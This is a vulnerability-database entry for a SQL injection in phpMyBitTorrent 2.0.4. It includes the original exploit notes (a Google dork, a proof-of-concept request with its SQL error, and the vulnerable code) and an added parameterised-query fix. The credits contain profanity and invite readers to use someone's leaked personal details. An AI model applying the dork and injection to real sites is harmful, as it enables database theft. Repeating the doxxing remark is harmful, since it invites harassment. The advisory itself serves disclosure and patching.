Vendor: phpMyBitTorrent
By: #forkbombers@irc.smashthestack.org
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: phpMyBitTorrent
Affected Version From: 2.0.4
Affected Version To: 2.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpmybittorrent:phpmybittorrent:2.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: *nix
2011

phpMyBitTorrent 2.0.4 SQL injection

phpMyBitTorrent 2.0.4, an open source web-based BitTorrent tracker written in PHP and backed by a MySQL database, is vulnerable to SQL injection. The 'confirminvite.php' script places the 'id' request parameter directly into a SQL query, so an attacker can inject arbitrary SQL commands through it. Exploiting the flaw gives the attacker access to the database and the ability to execute arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of phpMyBitTorrent.

Exploit-DB raw data:

# Exploit Title: phpMyBitTorrent 2.0.4 SQL injection
# Google Dork: inurl:"user.php?op=register"
# Date: 14/FEB/2011
# Author: #forkbombers@irc.smashthestack.org
# Software Link: http://sourceforge.net/projects/phpmybittorrent/
# Version: 2.0.4
# Tested on: *nix

----------------------------------------------------------------------
			[INFO]

Sadly, although the Google dork returns 36,000 results, the invitation
system needs to be enabled for this exploit to work. Fucking useless to me.

----------------------------------------------------------------------
			[XPL]

localhost/torrents/confirminvite.php?id=1'

Error Executing SQL Query SELECT password, active FROM torrent_users WHERE id =

----------------------------------------------------------------------
			[CODE]
[code]
// $id comes from the request and is placed in the query unquoted and unescaped
$sql = "SELECT password, active FROM ".$db_prefix."_users WHERE id = $id";
$res = $db->sql_query($sql) or btsqlerror($sql);
$row = $db->sql_fetchrow($res);

if (!$row)
    bterror(_bterrusernotexists,_btsorry);

if ($row["active"] != '0') {
    OpenTable(_btsignup);
    echo "<p>"._btuseralreadyactive."</p>";
    CloseTable();
    include('footer.php');
}
[/code]

----------------------------------------------------------------------
			[CREDS]

Thanks to Gumbie@irc.efnet.org for letting me use his box to test :)
Fuck ak for being such a bitch (not really <3 u), btw his d0x are g00gleiz3d if you want to give him a call

----------------------------------------------------------------------
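
A hardened form of the lookup shown under [CODE], as an added example that is not part of the original advisory and is not the vendor's patch. It assumes PDO with an in-memory SQLite database as a stand-in for the project's MySQL-backed `$db` wrapper; the helper name `findInvitedUser` and the table contents are hypothetical and constructed.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the tracker database (assumption: PDO + SQLite
// replace the project's MySQL-backed $db wrapper so the example runs offline).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE torrent_users (id INTEGER PRIMARY KEY, password TEXT, active INTEGER)');
$pdo->exec("INSERT INTO torrent_users VALUES (1, 'constructed-hash', 0)");

/**
 * Hypothetical helper: look up the invited user by id.
 * Returns the row, or null when the id is malformed or unknown.
 */
function findInvitedUser(PDO $pdo, string $rawId): ?array
{
    // 1. Allow-list validation: the id must parse as a positive integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterised query: the value is bound as an integer and is never
    //    concatenated into the SQL text, unlike "WHERE id = $id".
    $stmt = $pdo->prepare('SELECT password, active FROM torrent_users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// "1'" is the request value shown in the advisory; the others are constructed.
foreach (['1', "1'", '', '2'] as $input) {
    $row = findInvitedUser($pdo, $input);
    printf(
        "%-5s => %s\n",
        var_export($input, true),
        $row === null ? 'rejected or not found' : 'row found, active=' . $row['active']
    );
}
```

The malformed id never reaches the database, so the "Error Executing SQL Query" message shown under [XPL], which echoes the query text back to the client, is not triggered by it.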